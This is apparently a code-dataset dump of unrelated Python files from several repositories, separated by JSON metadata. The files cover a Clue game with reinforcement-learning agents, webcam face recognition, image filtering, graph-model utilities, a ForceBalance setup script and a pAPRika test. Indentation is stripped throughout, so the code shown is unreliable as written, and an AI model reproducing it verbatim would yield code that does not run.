train_df[col] = train_df[col].map({'T':1, 'F':0})
test_df[col] = test_df[col].map({'T':1, 'F':0})
for col in ['M4']:
print('Encoding', col)
temp_df = pd.concat([train_df[[col]], test_df[[col]]])
col_encoded = temp_df[col].value_counts().to_dict()
train_df[col] = train_df[col].map(col_encoded)
test_df[col] = test_df[col].map(col_encoded)
print(col_encoded)
########################### Identity columns ##################################
def minify_identity_df(df):
df['id_12'] = df['id_12'].map({'Found':1, 'NotFound':0})
df['id_15'] = df['id_15'].map({'New':2, 'Found':1, 'Unknown':0})
df['id_16'] = df['id_16'].map({'Found':1, 'NotFound':0})
df['id_23'] = df['id_23'].map({'TRANSPARENT':4, 'IP_PROXY':3, 'IP_PROXY:ANONYMOUS':2, 'IP_PROXY:HIDDEN':1})
df['id_27'] = df['id_27'].map({'Found':1, 'NotFound':0})
df['id_28'] = df['id_28'].map({'New':2, 'Found':1})
df['id_29'] = df['id_29'].map({'Found':1, 'NotFound':0})
df['id_35'] = df['id_35'].map({'T':1, 'F':0})
df['id_36'] = df['id_36'].map({'T':1, 'F':0})
df['id_37'] = df['id_37'].map({'T':1, 'F':0})
df['id_38'] = df['id_38'].map({'T':1, 'F':0})
df['id_34'] = df['id_34'].fillna(':0')
df['id_34'] = df['id_34'].apply(lambda x: x.split(':')[1]).astype(np.int8)
df['id_34'] = np.where(df['id_34']==0, np.nan, df['id_34'])
df['id_33'] = df['id_33'].fillna('0x0')
df['id_33_0'] = df['id_33'].apply(lambda x: x.split('x')[0]).astype(int)
df['id_33_1'] = df['id_33'].apply(lambda x: x.split('x')[1]).astype(int)
df['id_33'] = np.where(df['id_33']=='0x0', np.nan, df['id_33'])
df['DeviceType'].map({'desktop':1, 'mobile':0})
return df
train_identity = minify_identity_df(train_identity)
test_identity = minify_identity_df(test_identity)
for col in ['id_33']:
train_identity[col] = train_identity[col].fillna('unseen_before_label')
test_identity[col] = test_identity[col].fillna('unseen_before_label')
le = LabelEncoder()
le.fit(list(train_identity[col])+list(test_identity[col]))
train_identity[col] = le.transform(train_identity[col])
test_identity[col] = le.transform(test_identity[col])
########################### Final Minification ######################################
train_df = reduce_mem_usage(train_df)
test_df = reduce_mem_usage(test_df)
train_identity = reduce_mem_usage(train_identity)
test_identity = reduce_mem_usage(test_identity)
########################### Export ########################################
train_df.to_pickle('train_transaction.pkl')
test_df.to_pickle('test_transaction.pkl')
train_identity.to_pickle('train_identity.pkl')
test_identity.to_pickle('test_identity.pkl')
```
|
{
"source": "jeff012345/clue-part-duo",
"score": 4
}
|
#### File: jeff012345/clue-part-duo/astar.py
```python
import heapq
from typing import List
from definitions import RoomPosition, Position
import random
import sys
class PriorityQueue:
def __init__(self):
self.elements: Array = []
def empty(self) -> bool:
return len(self.elements) == 0
def put(self, item, priority: float):
heapq.heappush(self.elements, (priority, random.randint(1, 9999999999999999), item))
def get(self):
return heapq.heappop(self.elements)[2]
def heuristic(a: Position, b: Position) -> float:
if a == b:
return 0
if isinstance(a, RoomPosition):
if isinstance(b, RoomPosition):
raise Exception("Cannot calculate heuristic between two rooms")
return 1 # (1^2 + 0^2)
if isinstance(b, RoomPosition):
return 1 # (1^2 + 0^2)
# both are Space
return (a.col - b.col) ** 2 + (a.row - b.row) ** 2
def a_star_search(start: Position, goal: Position) -> List[Position]:
if start is None:
raise Exception("Start is None")
if goal is None:
raise Exception("goal is None")
if start == goal:
raise Exception('Start and goal are the same')
frontier = PriorityQueue()
frontier.put(start, 0)
came_from: Dict[Position, Optional[Position]] = {}
cost_so_far: Dict[Position, float] = {}
came_from[start] = None
cost_so_far[start] = 0
while not frontier.empty():
current: Position = frontier.get()
if current == goal:
break
for next in current.connections:
if isinstance(next, RoomPosition) and next != goal:
# once you enter a room, it's a dead end
continue
new_cost = cost_so_far[current] + 1
if next not in cost_so_far or new_cost < cost_so_far[next]:
cost_so_far[next] = new_cost
priority = new_cost + heuristic(goal, next)
frontier.put(next, priority)
came_from[next] = current
if frontier.empty():
print(str(start) + " to " + str(goal))
raise Exception('no path found')
shortest_path = []
prev = goal
while prev is not None:
shortest_path.append(prev)
prev = came_from[prev]
shortest_path.reverse()
return shortest_path
```
#### File: jeff012345/clue-part-duo/definitions.py
```python
from __future__ import annotations
from enum import Enum
from typing import List, Tuple
import random
def roll_dice() -> int:
return random.randint(1, 6)
def pretty_print_enum(enum: Enum):
return " ".join(list(map(lambda s: s.lower().capitalize(), enum.name.split("_"))))
class Room(Enum):
STUDY = 1
LIBRARY = 2
CONSERVATORY = 3
HALL = 4
KITCHEN = 5
BALLROOM = 6
DINING_ROOM = 7
LOUNGE = 8
BILLARD_ROOM = 9
def pretty(self):
return pretty_print_enum(self)
class Character(Enum):
MRS_WHITE = 1
MRS_PEACOCK = 2
MISS_SCARLET = 3
COLONEL_MUSTARD = 4
MR_GREEN = 5
PROFESSOR_PLUM = 6
def pretty(self):
return pretty_print_enum(self)
class Weapon(Enum):
CANDLESTICK = 1
REVOLVER = 2
ROPE = 3
WRENCH = 4
LEAD_PIPE = 5
KNIFE = 6
def pretty(self):
return pretty_print_enum(self)
class CardType(Enum):
ROOM = 1
CHARACTER = 2
WEAPON = 3
def pretty(self):
return pretty_print_enum(self)
class Position:
connections: List[Position]
def __init__(self, connections=[]):
self.connections = connections
class RoomPosition(Position):
room: Room
def __init__(self, room: Room, connections: List[Position]):
super().__init__(connections)
self.room = room
def __repr__(self):
return str(self.room) ## + "; " + str(self.connections)
def __eq__(self, other):
if isinstance(other, RoomPosition):
return self.room == other.room
return False
def __ne__(self, other):
"""Overrides the default implementation (unnecessary in Python 3)"""
x = self.__eq__(other)
if x is not NotImplemented:
return not x
return NotImplemented
def __hash__(self):
return super().__hash__()
class Space(Position):
row: int
col: int
def __init__(self, row, col, connections=[]):
super().__init__(connections)
self.row = row
self.col = col
def __repr__(self):
return self.pos_str()
def pos_str(self):
return "(" + str(self.row + 1) + "," + str(self.col + 1) + ")"
def __eq__(self, other):
if isinstance(other, Space):
return self.row == other.row and self.col == other.col
return False
def __ne__(self, other):
"""Overrides the default implementation (unnecessary in Python 3)"""
x = self.__eq__(other)
if x is not NotImplemented:
return not x
return NotImplemented
def __hash__(self):
return super().__hash__()
class Card:
value: Enum
type: CardType
def __init__(self, value: Enum, type: CardType):
self.value = value
self.type = type
def __str__(self):
return self.value.pretty()
def __repr__(self):
return self.value.name
def __eq__(self, other):
"""Overrides the default implementation"""
if isinstance(other, Card):
return self.type == other.type and self.value == other.value
return False
def __ne__(self, other):
"""Overrides the default implementation (unnecessary in Python 3)"""
x = self.__eq__(other)
if x is not NotImplemented:
return not x
return NotImplemented
def __hash__(self):
"""Overrides the default implementation"""
return hash(tuple(sorted(self.__dict__.items())))
class Solution:
weapon: Card
character: Card
room: Card
def __init__(self, weapon: Card, character: Card, room: Card):
self.weapon = weapon
self.character = character
self.room = room
def is_complete(self):
return self.weapon is not None and self.room is not None and self.character is not None
def is_empty(self):
return self.weapon is None and self.room is None and self.character is None
def __repr__(self):
c = 'None' if self.character is None else self.character.value.pretty()
r = 'None' if self.room is None else self.room.value.pretty()
w = 'None' if self.weapon is None else self.weapon.value.pretty()
return c + " in the " + r + " with the " + w
def is_match(self, other: Solution):
return self.weapon == other.weapon and self.room == other.room and self.character == other.character
class Deck:
def make_deck() -> List[Card]:
return [
Card(Room.STUDY, CardType.ROOM),
Card(Room.LIBRARY, CardType.ROOM),
Card(Room.CONSERVATORY, CardType.ROOM),
Card(Room.HALL, CardType.ROOM),
Card(Room.KITCHEN, CardType.ROOM),
Card(Room.BALLROOM, CardType.ROOM),
Card(Room.DINING_ROOM, CardType.ROOM),
Card(Room.LOUNGE, CardType.ROOM),
Card(Room.BILLARD_ROOM, CardType.ROOM),
Card(Character.MRS_WHITE, CardType.CHARACTER),
Card(Character.MRS_PEACOCK, CardType.CHARACTER),
Card(Character.MISS_SCARLET, CardType.CHARACTER),
Card(Character.COLONEL_MUSTARD, CardType.CHARACTER),
Card(Character.MR_GREEN, CardType.CHARACTER),
Card(Character.PROFESSOR_PLUM, CardType.CHARACTER),
Card(Weapon.CANDLESTICK, CardType.WEAPON),
Card(Weapon.REVOLVER, CardType.WEAPON),
Card(Weapon.ROPE, CardType.WEAPON),
Card(Weapon.WRENCH, CardType.WEAPON),
Card(Weapon.LEAD_PIPE, CardType.WEAPON),
Card(Weapon.KNIFE, CardType.WEAPON)
]
static_deck = make_deck()
```
#### File: jeff012345/clue-part-duo/log_book_ui.py
```python
from typing import List, Set, Dict, Tuple, Optional
import pygame
from pygame_gui import UIManager
from pygame_gui.elements import UIPanel, UILabel, UITextBox, UIButton, UIImage
from definitions import *
class LogBookPanel:
CHECKED_IMG = pygame.image.load('assets/checked.png')
UNCHECKED_IMG = pygame.image.load('assets/unchecked.png')
PANEL_WIDTH = 200
panel: UIPanel
_checkboxes: Dict[UIImage, bool]
def __init__(self, manager: UIManager):
self.manager = manager
self._checkboxes = dict()
panel_rect = pygame.Rect((0,0), (LogBookPanel.PANEL_WIDTH, 1000))
self.panel = UIPanel(panel_rect, 0, manager, element_id='log_book_panel')
UILabel(pygame.Rect((0,0), (LogBookPanel.PANEL_WIDTH, 20)),
"Player Logbook",
manager,
container=self.panel,
object_id="categoryLabel")
height = self._create_section("Chacater", Character, 20)
height = self._create_section("Room", Room, height)
self._create_section("Weapon", Weapon, height)
self.panel.hide()
def show(self):
self.panel.show()
def process_events(self, event):
if event.type == pygame.MOUSEBUTTONUP:
pos = pygame.mouse.get_pos()
# check if click is inside panel first?
for cb in self._checkboxes.keys():
if cb.get_abs_rect().collidepoint(pos):
self._toggle_img(cb)
break
def _create_section(self, title: str, items: Enum, y_offset) -> int:
item_height = 35
label_rect = pygame.Rect((0, y_offset), (LogBookPanel.PANEL_WIDTH, item_height))
label_text = "<strong>" + title + "</strong>"
title_label = UITextBox(label_text, label_rect, self.manager, container=self.panel)
y_offset += item_height
item_label_width = LogBookPanel.PANEL_WIDTH - 30
for item in items:
img_rect = pygame.Rect((5, y_offset + 6), (24, 24))
checkbox_img = UIImage(img_rect, LogBookPanel.UNCHECKED_IMG, self.manager, container=self.panel)
label_rect = pygame.Rect((30, y_offset), (item_label_width, item_height))
item_button = UITextBox(item.pretty(), label_rect, self.manager, container=self.panel)
self._checkboxes[checkbox_img] = False
y_offset += item_height
return y_offset
def _toggle_img(self, checkbox: UIImage):
if self._checkboxes.get(checkbox):
checkbox.set_image(LogBookPanel.UNCHECKED_IMG)
self._checkboxes[checkbox] = False
else:
checkbox.set_image(LogBookPanel.CHECKED_IMG)
self._checkboxes[checkbox] = True
```
#### File: jeff012345/clue-part-duo/main.py
```python
import threading
import sys
import os
import traceback
import game_board
from Clue import Director
from player import NaiveComputerPlayer, HumanPlayer
from ai_players import RLPlayer, DuelAiPlayer
from paths import Board
## Model Config
room_policy_dir = os.path.join("best_policies", "room")
guess_policy_dir = os.path.join("best_policies", "character_weapon")
## setup
new_game_barrier = threading.Barrier(3)
set_guess_barrier = threading.Barrier(3)
next_turn_barrier = threading.Barrier(3)
end_game_lock = threading.Lock()
run_game_lock = threading.Lock()
run_game_lock.acquire()
interaction_lock = threading.Lock()
human_player = HumanPlayer(interaction_lock)
ai_player = DuelAiPlayer(set_guess_barrier, next_turn_barrier)
players = [
NaiveComputerPlayer(),
NaiveComputerPlayer(),
NaiveComputerPlayer(),
NaiveComputerPlayer(),
human_player,
ai_player
]
director = Director(end_game_lock, players, interaction_lock)
def load_room_env():
import tensorflow as tf
from tf_agents.environments import tf_py_environment
from tf_agents.policies import policy_saver
from clue_room_tf_env import ClueGameRoomEnvImplementation
tf.compat.v1.enable_v2_behavior()
eval_py_env = ClueGameRoomEnvImplementation(director, set_guess_barrier, next_turn_barrier)
eval_tf_env = tf_py_environment.TFPyEnvironment(eval_py_env)
saved_policy = tf.compat.v2.saved_model.load(room_policy_dir)
return (eval_tf_env, saved_policy)
def load_guess_env():
import tensorflow as tf
from tf_agents.environments import tf_py_environment
from tf_agents.policies import policy_saver
from clue_tf_env import ClueGameEnvImplementation
tf.compat.v1.enable_v2_behavior()
eval_py_env = ClueGameEnvImplementation(director, set_guess_barrier, next_turn_barrier)
eval_tf_env = tf_py_environment.TFPyEnvironment(eval_py_env)
saved_policy = tf.compat.v2.saved_model.load(guess_policy_dir)
return (eval_tf_env, saved_policy)
# THREAD: runs the UI game board
def run_board():
try:
game_board.run(director, run_game_lock, end_game_lock, human_player, interaction_lock)
except Exception as err:
end_game_lock.acquire()
traceback.print_tb(err.__traceback__)
raise err
# THREAD: runs the game director
def run_game():
try:
Board.calculate_room_distances()
# wait for player to start the game
run_game_lock.acquire()
if end_game_lock.locked():
# player quit game before start
new_game_barrier.abort()
return
director.new_game()
# signal this thread is ready to start
new_game_barrier.wait()
director.play_auto_game_with_lock(end_game_lock)
#game is done
if not end_game_lock.locked():
end_game_lock.acquire()
# signal env threads to quit
next_turn_barrier.abort()
except Exception as err:
if not end_game_lock.locked():
end_game_lock.acquire()
new_game_barrier.abort()
set_guess_barrier.abort()
next_turn_barrier.abort()
traceback.print_tb(err.__traceback__)
raise err
# THREAD: runs the weapon and character guess TF environment
def run_guess_ai():
try:
(guess_env, guess_policy) = load_guess_env()
# signal this thread is ready to start
new_game_barrier.wait()
# wait for first turn
next_turn_barrier.wait()
guess_time_step = guess_env.reset()
while not end_game_lock.locked():
# set the guess and wait for next turn
guess_action_step = guess_policy.action(guess_time_step)
guess_time_step = guess_env.step(guess_action_step.action)
except threading.BrokenBarrierError as err:
print("barrier was aborted. Quiting...")
except Exception as err:
if not end_game_lock.locked():
end_game_lock.acquire()
new_game_barrier.abort()
next_turn_barrier.abort()
set_guess_barrier.abort()
traceback.print_tb(err.__traceback__)
raise err
# THREAD: runs the room guess TF environment
def run_room_ai():
try:
(room_env, room_policy) = load_room_env()
# signal this thread is ready to start
new_game_barrier.wait()
# wait for first turn
next_turn_barrier.wait()
room_time_step = room_env.reset()
while not end_game_lock.locked():
# set the guess and wait for next turn
room_action_step = room_policy.action(room_time_step)
room_time_step = room_env.step(room_action_step.action)
except threading.BrokenBarrierError as err:
print("barrier was aborted. Quiting...")
except Exception as err:
if not end_game_lock.locked():
end_game_lock.acquire()
new_game_barrier.abort()
next_turn_barrier.abort()
set_guess_barrier.abort()
traceback.print_tb(err.__traceback__)
raise err
if __name__ == "__main__":
thread1 = threading.Thread(target=run_board)
thread2 = threading.Thread(target=run_game)
thread3 = threading.Thread(target=run_room_ai)
thread4 = threading.Thread(target=run_guess_ai)
# Will execute both in parallel
thread1.start()
thread2.start()
thread3.start()
thread4.start()
# Joins threads back to the parent process, which is this program
thread1.join()
thread2.join()
thread3.join()
thread4.join()
```
#### File: jeff012345/clue-part-duo/player_roll.py
```python
from __future__ import annotations
from typing import List, Set, Dict, Tuple, Optional
import pygame
import pygame_gui
from player import HumanPlayer
from paths import Board, board_spaces, doors
from game_board_util import scale_position
from definitions import roll_dice
from log_book_ui import LogBookPanel
from definitions import RoomPosition
class PlayerRoll:
### Static
SPACE_COLOR = (0, 0, 0)
def _is_adjacent(p1, p2):
return (abs(p1[0] - p2[0]) == 1 and p1[1] == p2[1]) \
or (abs(p1[1] - p2[1]) == 1 and p1[0] == p2[0])
def _valid_position(pos):
return pos[0] >= 0 and pos[0] < 25 and pos[1] >= 0 and pos[1] < 24 \
and board_spaces[pos[0]][pos[1]] != 0
player: HumanPlayer
surface: pygame.Surface
on_end_turn: Callable
_rolling: bool
_distance: int
_positions: List[Position]
_rect_to_position: Dict[Tuple, Position]
_rects: List[pygame.Rect]
_drawn_rects: List[pygame.Rect]
def __init__(self, surface: pygame.Surface, player: HumanPlayer, on_end_turn: Callable):
self.surface = surface
self._rolling = False
self.player = player
self.on_end_turn = on_end_turn
def roll(self):
self._rolling = True
self._distance = roll_dice()
print("rolled a " + str(self._distance))
self._calculate_positions()
def _calculate_positions(self):
edge = set(self.player.board_position.connections)
self._positions = list(self._find_all_positions_search(self._distance, edge, set()))
self._rects = []
self._rect_to_position = dict()
for p in self._positions:
coords = list(map(scale_position, Board.coords_from_position(p)))
new_rects = list(map(lambda p: pygame.Rect((p[0] - 5, p[1] - 5), (11, 11)), coords))
self._rects.extend(new_rects)
for r in new_rects:
self._rect_to_position[(r.x, r.y)] = p
def _find_all_positions_search(self, distance: int, edge: Set[Position],
all_positions: Set[Position]) -> Set[Position]:
if distance == 1:
return all_positions.union(edge)
new_edge: Set[Position] = set()
for p in edge:
all_positions.add(p)
if isinstance(p, RoomPosition):
# the path stops at the door
continue
for conn in p.connections:
if conn not in all_positions and conn not in edge \
and conn != self.player.board_position:
# haven't seen this node before
new_edge.add(conn)
return self._find_all_positions_search(distance - 1, new_edge, all_positions)
def draw(self):
if not self._rolling:
return
self._drawn_rects = list(map(lambda rect: pygame.draw.rect(self.surface, PlayerRoll.SPACE_COLOR, rect), self._rects))
def process_events(self, event):
if not self._rolling:
return
if event.type == pygame.MOUSEBUTTONUP:
pos = pygame.mouse.get_pos()
i = 0
for rect in self._drawn_rects:
rect = rect.move(LogBookPanel.PANEL_WIDTH, 0)
if rect.collidepoint(pos):
org_rect = self._rects[i]
self._click_move(self._rect_to_position[(org_rect.x, org_rect.y)])
break
i += 1
def _click_move(self, pos: Position):
self.player.move(pos)
self._rolling = False
self.on_end_turn()
```
|
{
"source": "Jeff0407/Python_MachineLearning",
"score": 4
}
|
#### File: Computer_Vision/Real_Time_Face _Recognition/face_recognition.py
```python
import numpy as np
import cv2
import os
# -----------------------------KNN CODE -------------------------------------
def distance(v1, v2):
# Eucledian
return np.sqrt(((v1 - v2) ** 2).sum())
def knn(train, test, k=5):
dist = []
for i in range(train.shape[0]):
# Get vector and label
ix = train[i, :-1] # get the first data to the last second data on row i
iy = train[i, -1] # get the last data on row i
# Compute the distance from test point
d = distance(test, ix)
dist.append([d, iy])
# Sort based on distance and get top k
dk = sorted(dist, key=lambda x: x[0])[:k]
# Retrieve only the labels
labels = np.array(dk)[:, -1]
# Get frequencies of each label
output = np.unique(labels, return_counts=True)
# Find max frequency and corresponding label
index = np.argmax(output[1])
return output[0][index]
# -------------------------------------------------------------------------
cap = cv2.VideoCapture(0)
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
dataset_path = './face_dataset/'
face_data = [] # store each face data
labels = []
class_id = 0 # Labels for every given file
names = {} # mapping between id and name
# Dataset preparation: go through all the face_dataset file and load
# all the data we have collected by using face_data.py
for fx in os.listdir(dataset_path):
if fx.endswith('.npy'):
names[class_id] = fx[:-4]
data_item = np.load(dataset_path + fx)
face_data.append(data_item)
target = class_id * np.ones((data_item.shape[0],))
class_id += 1
labels.append(target)
face_dataset = np.concatenate(face_data, axis=0)
face_labels = np.concatenate(labels, axis=0).reshape((-1, 1))
print(face_labels.shape)
print(face_dataset.shape)
trainset = np.concatenate((face_dataset, face_labels), axis=1)
print(trainset.shape)
font = cv2.FONT_HERSHEY_SIMPLEX
while True:
ret, frame = cap.read()
if ret == False:
continue
# Convert frame to grayscale
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Detect multi faces in the image
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for face in faces:
x, y, w, h = face
# Get the face ROI
offset = 5
faces_section = frame[y-offset:y+h+offset, x-offset:x+w+offset]
faces_section = cv2.resize(faces_section, (100, 100))
# Use KNN to classify which face is shown on the webcam
out = knn(trainset, faces_section.flatten())
# Put the name of the face in the original image
cv2.putText(frame, names[int(out)], (x-35, y-5), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 2, cv2.LINE_AA)
# Draw rectangle in the original image
cv2.rectangle(frame, (x,y), (x+w, y+h), (0, 255, 0), 2)
cv2.imshow('Faces', frame)
if cv2.waitKey(1) == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
```
#### File: Image_Processing/Image_Processing_Applications/Fire_Detection.py
```python
from simpleimage import SimpleImage
HURDLE_FACTOR = 1.05
def highlight_fires(filename):
"""
:param filename str, the filename of the image
:return: SimpleImage, the processed image
"""
img = SimpleImage(filename)
for pixel in img:
avg = (pixel.green+pixel.blue+pixel.red)//3 # calculate the average pixel value of red, green and blue
if pixel.red > avg * HURDLE_FACTOR:
pixel.red = 255
pixel.blue = 0
pixel.green = 0
else:
pixel.red = avg
pixel.blue = avg
pixel.green = avg
return img
def main():
"""
First show the original fire.png image and then input the image to highlight_fires function
ans show the result of fire highlight image
"""
original_fire = SimpleImage('images/greenland-fire.png')
original_fire.show()
highlighted_fire = highlight_fires('images/greenland-fire.png')
highlighted_fire.show()
if __name__ == '__main__':
main()
```
|
{
"source": "Jeff20100601/GHNN_clean",
"score": 2
}
|
#### File: Jeff20100601/GHNN_clean/utils_ct.py
```python
import os
from settings import settings
import numpy as np
import torch
import argparse
def get_total_number(inPath, fileName):
with open(os.path.join(inPath, fileName), 'r') as fr:
for line in fr:
line_split = line.split()
return int(line_split[0]), int(line_split[1]), int(line_split[2])
def load_quadruples(inPath, fileName):
with open(os.path.join(inPath, fileName), 'r') as fr:
quadrupleList = []
times = set()
for line in fr:
line_split = line.split()
head = int(line_split[0])
tail = int(line_split[2])
rel = int(line_split[1])
time = int(int(line_split[3])/settings['time_scale'])
quadrupleList.append([head, rel, tail, time])
times.add(time)
times = list(times)
times.sort()
return np.asarray(quadrupleList), np.asarray(times)
def make_batch(a, b, c, d, e, f, g, h, j, k, l, m, n, valid1 = None, valid2 = None):
if valid1 is None and valid2 is None:
# For item i in a range that is a length of l
for i in range(0, len(a), n):
yield [a[i:i + n], b[i:i + n], c[i:i + n], d[i:i + n], e[i:i + n],
f[i:i + n], g[i:i + n], h[i:i + n], j[i:i + n], k[i:i + n], l[i:i + n], m[i:i + n]]
else:
# For item i in a range that is a length of l
for i in range(0, len(a), n):
yield [a[i:i + n], b[i:i + n], c[i:i + n], d[i:i + n], e[i:i + n],
f[i:i + n], g[i:i + n], h[i:i + n], j[i:i + n], k[i:i + n], l[i:i + n], m[i:i + n],
valid1[i:i + n], valid2[i:i + n]]
def to_device(tensor):
if torch.cuda.is_available():
return tensor.cuda()
else:
return tensor
def isListEmpty(inList):
if isinstance(inList, list):
return all( map(isListEmpty, inList) )
return False
def get_sorted_s_r_embed(s_hist, s, r, ent_embeds, s_hist_dt):
s_hist_len = to_device(torch.LongTensor(list(map(len, s_hist))))
s_len, s_idx = s_hist_len.sort(0, descending=True)
num_non_zero = len(torch.nonzero(s_len))
s_len_non_zero = s_len[:num_non_zero]
s_hist_sorted = []
s_hist_dt_sorted = []
for idx in s_idx[:num_non_zero]:
s_hist_sorted.append(s_hist[idx.item()])
s_hist_dt_sorted.append(s_hist_dt[idx.item()])
flat_s = []
len_s = []
for hist in s_hist_sorted:
for neighs in hist:
len_s.append(len(neighs))
for neigh in neighs:
flat_s.append(neigh)
s_tem = s[s_idx]
r_tem = r[s_idx]
embeds = ent_embeds[to_device(torch.LongTensor(flat_s))]
embeds_split = torch.split(embeds, len_s)
return s_idx, s_len_non_zero, s_tem, r_tem, embeds, len_s, embeds_split, s_hist_dt_sorted
def str2bool(v: str) -> bool:
v = v.lower()
if v == "true":
return True
elif v == "false":
return False
else:
raise argparse.ArgumentTypeError("Boolean value expected, got" + str(v) + ".")
```
|
{
"source": "jeff231li/forcebalance",
"score": 2
}
|
#### File: jeff231li/forcebalance/setup.py
```python
from __future__ import print_function
__author__ = "<NAME>"
from setuptools import setup,Extension
import os,sys,re
import shutil
import glob
import argparse
import subprocess
#===================================#
#| ForceBalance version number |#
#| Make sure to update the version |#
#| manually in : |#
#| |#
#| doc/header.tex |#
#| doc/api_header.tex |#
#| bin/ForceBalance.py |#
#===================================#
__version__ = "v1.9.1"
try:
# use git to find current version
git_describe = subprocess.check_output(["git", "describe"]).strip()
__version__ = re.sub('-g[0-9a-f]*$','',git_describe)
except: pass
# The versioning file logic does not work.
# Commenting out until further notice.
# versioning_file = os.path.join(os.path.dirname(__file__), '.__version__')
# try:
# git_describe = subprocess.check_output(["git", "describe"]).strip()
# __version__ = re.sub('-g[0-9a-f]*$','',git_describe)
# with open(versioning_file, 'w') as fh:
# fh.write(__version__)
# #subprocess.call(["git", "add", ".__version__"])
# except:
# with open(versioning_file, 'r') as fh:
# __version__ = fh.read().strip()
# DCD file reading module
DCD = Extension('forcebalance/_dcdlib',
sources = [ "ext/molfile_plugin/dcdplugin_s.c" ],
libraries=['m'],
include_dirs = ["ext/molfile_plugin/include/","ext/molfile_plugin"]
)
# Hungarian algorithm for permutations
# Used for identifying normal modes
# PERMUTE = Extension('forcebalance/_assign',
# sources = ['ext/permute/apc.c', 'ext/permute/assign.c'],
# include_dirs = [numpy.get_include(), os.path.join(numpy.get_include(), 'numpy')]
# )
# 'contact' library from MSMBuilder for rapidly computing interatomic distances.
# If we're on Mac OS, it can't find the OpenMP libraries
# import platform
# if platform.system() == 'Darwin':
# CONTACT = Extension('forcebalance/_contact_wrap',
# sources = ["ext/contact/contact.c",
# "ext/contact/contact_wrap.c"],
# extra_compile_args=["-std=c99","-O3","-shared",
# "-Wall"],
# include_dirs = [numpy.get_include(), os.path.join(numpy.get_include(), 'numpy')])
# else:
# CONTACT = Extension('forcebalance/_contact_wrap',
# sources = ["ext/contact/contact.c",
# "ext/contact/contact_wrap.c"],
# extra_compile_args=["-std=c99","-O3","-shared",
# "-fopenmp", "-Wall"],
# extra_link_args=['-lgomp'],
# include_dirs = [numpy.get_include(), os.path.join(numpy.get_include(), 'numpy')])
def buildKeywordDictionary(args):
setupKeywords = {}
setupKeywords["name"] = "forcebalance"
# Don't create a separate installed version number for every commit
setupKeywords["version"] = re.sub('-[0-9]*$','',__version__)
setupKeywords["author"] = "<NAME>"
setupKeywords["author_email"] = "<EMAIL>"
setupKeywords["license"] = "BSD 2.0"
setupKeywords["url"] = "https://simtk.org/home/forcebalance"
setupKeywords["download_url"] = "https://simtk.org/home/forcebalance"
setupKeywords["scripts"] = glob.glob("bin/*.py") + glob.glob("bin/*.sh") + glob.glob("bin/*.bash") + glob.glob("bin/ForceBalance") + glob.glob("bin/TidyOutput")
setupKeywords["packages"] = ["forcebalance"]
setupKeywords["package_dir"] = {"forcebalance" : "src",
}
setupKeywords["package_data"] = {
"forcebalance" : ["AUTHORS","LICENSE.txt","data/*.py","data/*.sh","data/*.bash","data/uffparms.in","data/oplsaa.ff/*"]
}
setupKeywords["data_files"] = []
setupKeywords["ext_modules"] = [DCD]
setupKeywords["platforms"] = ["Linux"]
setupKeywords["description"] = "Automated force field optimization."
# setupKeywords["install_requires"] = ['networkx>=1.9,<2.0', 'decorator>=3.4.0']
setupKeywords["long_description"] = """
ForceBalance (https://simtk.org/home/forcebalance) is a library
that provides tools for automated optimization of force fields and
empirical potentials.
The philosophy of this program is to present force field
optimization in a unified and easily extensible framework. Since
there are many different ways in theoretical chemistry to compute
the potential energy of a collection of atoms, and similarly many
types of reference data to fit these potentials to, we do our best
to provide an infrastructure which allows a user or a contributor
to fit any type of potential to any type of reference data.
"""
if not args.dirty: doClean()
# setupKeywords["packages"].append("forcebalance.unit")
if args.test:
setupKeywords["packages"].append("forcebalance.test")
setupKeywords["package_dir"].update({"forcebalance.test" : "test"})
os.chdir("test") # change directories to glob test files
test_data = glob.glob("files/*.*") + glob.glob("files/forcefield/*.*") + glob.glob("files/targets/*/*.*") + glob.glob("files/*.*") + ["files/work_queue_worker"]
os.chdir("..")
setupKeywords["package_data"].update({'forcebalance.test': test_data})
if args.gui:
setupKeywords["packages"].append("forcebalance.gui")
return setupKeywords
def doClean():
"""Remove existing forcebalance module folder before installing"""
try:
forcebalance_dir=os.path.dirname(__import__('forcebalance').__file__)
except ImportError:
print("Couldn't find existing forcebalance installation. Nothing to clean...\n")
return
except:
print("Couldn't read forcebalance location... Continuing with regular install")
return
#raw_input("All files in %s will be deleted for clean\nPress <Enter> to continue, <Ctrl+C> to abort\n" % forcebalance_dir)
print("Removing the directory tree prior to install: %s" % forcebalance_dir)
subprocess.call("rm -f %s/../forcebalance-*.egg-info" % forcebalance_dir, shell=True)
if os.path.exists(forcebalance_dir):
shutil.rmtree(forcebalance_dir, ignore_errors=True)
def main():
# if len(os.path.split(__file__)[0]) > 0:
# os.chdir(os.path.split(__file__)[0])
## Install options
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--dirty', action='store_true', help="don't remove previously installed forcebalance installation first")
parser.add_argument('-t', '--test', action='store_true', help='install forcebalance test suite')
parser.add_argument('-g', '--gui', action='store_true', help='install forcebalance gui module')
args, sys.argv= parser.parse_known_args(sys.argv)
setupKeywords=buildKeywordDictionary(args)
## Run setuptools command.
## Refer to setup.cfg for customizing installation behavior
setup(**setupKeywords)
if os.path.exists('build'):
shutil.rmtree('build')
try:
import bz2
except ImportError:
print("Error importing bz2, which is important for distributed calculations and remote targets")
print("Please either (1) make sure Python is built/installed with bz2 support")
print("or (2) proceed with inefficient reading/writing of files; remote targets won't work.")
if __name__ == '__main__':
main()
```
|
{
"source": "jeff231li/pAPRika",
"score": 2
}
|
#### File: paprika/tests/test_tleap.py
```python
import random as random
import shutil
import pytest
from paprika.align import *
from paprika.dummy import *
from paprika.tleap import *
@pytest.fixture
def clean_files(directory=os.path.join(os.path.dirname(__file__), "tmp")):
# This happens before the test function call
if os.path.isdir(directory):
shutil.rmtree(directory)
os.makedirs(directory)
yield
# This happens after the test function call
shutil.rmtree(directory)
@pytest.mark.slow
def test_solvation_simple(clean_files):
""" Test that we can solvate CB6-BUT using default settings. """
waters = np.random.randint(100, 10000)
log.debug("Trying {} waters with default settings...".format(waters))
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.target_waters = waters
sys.output_prefix = "solvate"
sys.build()
